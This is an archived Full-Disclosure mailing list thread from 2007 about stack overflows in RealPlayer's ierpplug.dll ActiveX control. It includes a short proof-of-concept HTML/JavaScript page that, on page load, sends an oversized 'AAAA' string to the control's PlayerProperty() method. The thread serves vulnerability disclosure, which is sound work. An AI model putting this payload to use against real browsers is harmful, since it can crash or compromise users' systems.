<head><style>body{font-family: Geneva,Arial,Helvetica,sans-serif;font-size:9pt;background-color: #ffffff;color: black;}</style></head><body id="compText">Ouch is right.. I know I confused alot of people, I apologize for that. Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its own BID, http://www.securityfocus.com/bid/26586. I have been in contact with Symantec's DeepSight team, and it looks like the Import() function will still throw a stack overflow exception, however it does not appear to overwrite the EIP, making it a plain old DoS attack. I believe they plan to post a write-up on this.<br><br>Elazar<br><br><br><blockquote style="border-left: 2px solid rgb(0, 0, 255); padding-left: 5px; margin-left: 0px;">-----Original Message-----
<br>From: James Matthews <nytrokiss@gmail.com>
<br>Sent: Nov 26, 2007 7:24 PM
<br>To: Elazar Broad <elazarb@earthlink.net>
<br>Cc: "full-disclosure@lists.grok.org.uk" <full-disclosure@lists.grok.org.uk>
<br>Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
<br><br>Ouch! <br><br></full-disclosure@lists.grok.org.uk></elazarb@earthlink.net></nytrokiss@gmail.com><div class="gmail_quote">On Nov 26, 2007 9:15 PM, Elazar Broad <<a target="_blank" href="mailto:elazarb@earthlink.net">elazarb@earthlink.net</a>> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really <a href="http://www.securityfocus.com/bid/26130" target="_blank">http://www.securityfocus.com/bid/26130
</a>, although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer
ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:<br><br>-------------<br><!--<br>written by e.b.<br>--><br><html><br>
<head><br> <script language="JavaScript" DEFER><br> function Check() {<br> var s = "AAAA";<br><br> while (s.length < 999999) s=s+s;<br><br> var obj = new ActiveXObject("
IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}<br><br> var obj2 = obj.PlayerProperty(s);<br><br><br> }<br> </script><br><br> </head><br> <body onload="JavaScript: return Check();">
<br><br> </body><br></html><br>-------------<br><br>Elazar<br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br><br clear="all"><br>-- <br><a target="_blank" href="http://www.goldwatches.com/coupons/">
http://www.goldwatches.com/coupons/</a><br><a target="_blank" href="http://www.jewelerslounge.com">http://www.jewelerslounge.com</a>
</blockquote></body><script type="text/javascript"><!--
function __RP_Callback_Helper(str, strCallbackEvent, splitSize, func){var event = null;if (strCallbackEvent){event = document.createEvent('Events');event.initEvent(strCallbackEvent, true, true);}if (str && str.length > 0){var splitList = str.split('|');var strCompare = str;if (splitList.length == splitSize)strCompare = splitList[splitSize-1];var pluginList = document.plugins;for (var count = 0; count < pluginList.length; count++){var sSrc = '';if (pluginList[count] && pluginList[count].src)sSrc = pluginList[count].src;if (strCompare.length >= sSrc.length){if (strCompare.indexOf(sSrc) != -1){func(str, count, pluginList, splitList);break;}}}}if (strCallbackEvent)document.body.dispatchEvent(event);}function __RP_Coord_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Coord_Callback = str;pluginList[index].__RP_Coord_Callback_Left = splitList[0];pluginList[index].__RP_Coord_Callback_Top = splitList[1];pluginList[index].__RP_Coord_Callback_Right = splitList[2];pluginList[index].__RP_Coord_Callback_Bottom = splitList[3];};__RP_Callback_Helper(str, 'rp-js-coord-callback', 5, func);}function __RP_Url_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Url_Callback = str;pluginList[index].__RP_Url_Callback_Vid = splitList[0];pluginList[index].__RP_Url_Callback_Parent = splitList[1];};__RP_Callback_Helper(str, 'rp-js-url-callback', 3, func);}function __RP_TotalBytes_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_TotalBytes_Callback = str;pluginList[index].__RP_TotalBytes_Callback_Bytes = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}function __RP_Connection_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Connection_Callback = str;pluginList[index].__RP_Connection_Callback_Url = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}
//--></script>